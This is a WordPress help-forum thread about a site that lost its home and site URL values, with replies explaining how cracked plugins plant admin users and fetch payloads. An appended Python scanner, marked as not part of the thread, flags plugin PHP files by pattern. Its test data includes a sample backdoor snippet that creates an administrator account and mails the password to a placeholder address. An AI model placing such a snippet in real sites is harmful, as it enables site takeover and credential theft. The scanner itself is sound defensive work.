Wordpress Discussion

Out of context: Reply #162

  • 174 Responses
  • cherub0

    I've been putting out wp fires left and right for the past 48 hours + with hardly any sleep. Which normally wouldn't be surprising except one small detail...

    I'm a wordpress newbie. This feels so unfair.

    My new wp site somehow LOST its WP_HOME and WP_SITEURL paths ...how it happened is beyond me but in the wp site health info tab, I see the word "undefined" next to "HOME URL" / "SITE URL" and I'm thinking... WOW... Just WOW. Thanks wordpress!

    This explains why I have been plagued with the 'Update failed' error over the last few days when trying to update my site, along with the "undefined is not an object" error (again, while updating).

    I'll just leave this here in case anyone has to deal with this shite.
    https://www.reddit.com/r/Wordpre…

    I added the lines to my wp-config.php file ... fingers crossed.

    • Hacked site? Change all passwords
      OBBTKN
    • Either that or my lousy host is using charity shop computers as their 'shared servers'. I could see both equally likely...
      cherub
    • I used this a while ago, when I was into wp stuff. local dev + backup. then upload to server.
      https://localwp.com/…
      uan
    • Poke around in the database and see if there are any suspicious entries in the WP_HOME and WP_SITEURL tables. Those look like db names to me.
      monNom
    • You might be able to manually enter the correct values and make things work again.
      They may have been changed by a plugin. You have to be very careful with them
      monNom
    • Because you basically give a plugin admin privileges with wordpress. A plugin can edit the db, and can load additional files from remote servers.
      monNom
    • You have to trust them 110%.
      monNom
    • 'you basically give a plugin admin privileges' WAT?? plugins have root? oh wow...
      cherub
    • "fingers crossed" spoiler alert... the bug came back. (see my post below)
      cherub
    • Maybe not root right away. One way I've seen is that a cracked plugin will have a php file that when run will create a new user, email them their credentials...
      monNom
    • cURL additional payloads to the server, etc. Then a bot will spider the web and query sites to see if they have that file... if they do, you get owned.
      monNom
    • For the cracker, they get a steady flow of new compromised servers every time they run their spider. Then they send spam, steal info, ransomware. It's a farm.
      monNom
    • Presumably the spider part isn’t even required, you just need to insert the new user code into a commonly accessed file that gets run by the plugin.
      monNom
    • ^that is scary as fuck. all of it.
      cherub
    • Probably the best way to learn your way around how Wordpress works is to build a theme yourself from scratch.
      monNom
    • There are a bunch of YouTube tutorials on exactly that. You’ll understand where the difference between static pages and posts comes from, and where things live.
      monNom
    • The customize menu is actually a giant security hole, so it’s best to lock it down.
      All your logs are on the Apache server. Php logs, sql logs, etc.
      monNom
    • And yes. Wordpress is way overkill for a landing page. Just do a static site. No worry about security, more performant, form handling can be done with embeds
      monNom
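
Added example, not part of the thread or any poster's words: a triage scan of a plugins directory for the pattern described in the comments above (a plugin PHP file that creates a user and also grants admin, mails out, or fetches remote content). The signal grouping, the sample plugin names and the file contents are assumptions constructed for illustration; the function names matched are real WordPress/PHP functions.

```python
import re
import tempfile
from pathlib import Path

# Function names are real WordPress/PHP APIs; grouping them into "signals"
# is this example's own heuristic, not an official WordPress check.
SIGNALS = {
    "creates_user": re.compile(r"\b(wp_create_user|wp_insert_user)\s*\("),
    "grants_admin": re.compile(
        r"""(set_role\s*\(\s*|['"]role['"]\s*=>\s*)['"]administrator['"]"""),
    "sends_mail": re.compile(r"\b(wp_mail|mail)\s*\("),
    "fetches_remote": re.compile(r"\b(curl_exec|wp_remote_get|wp_remote_post)\s*\("),
}

def scan_plugins(plugins_dir):
    """Map relative path -> signals, for PHP files that create a user AND
    show at least one other signal. Hits need human review: a legitimate
    membership plugin can also create users and send mail."""
    root = Path(plugins_dir)
    findings = {}
    for path in sorted(root.rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        hits = sorted(name for name, rx in SIGNALS.items() if rx.search(text))
        if "creates_user" in hits and len(hits) > 1:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

# Constructed sample plugin tree (hypothetical names, not from the thread).
SAMPLE_FILES = {
    "contact-form/form.php":
        "<?php function cf_send($to, $m) { wp_mail($to, 'Contact', $m); }",
    "members/register.php":
        "<?php $id = wp_create_user($login, $pass, $email);",
    "cracked-slider/inc/update.php":
        "<?php $id = wp_create_user('support', $p, 'a@example.invalid');\n"
        "$u = new WP_User($id); $u->set_role( 'administrator' );\n"
        "wp_mail('a@example.invalid', 'new site', $p);",
}

def demo():
    # Write the constructed files to a temp dir and scan it.
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in SAMPLE_FILES.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_plugins(tmp)

if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"REVIEW {rel}: {', '.join(hits)}")
```

Point `scan_plugins()` at a copy of `wp-content/plugins` taken from a backup; a clean result does not prove a plugin is safe, since obfuscated code will not match these patterns.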
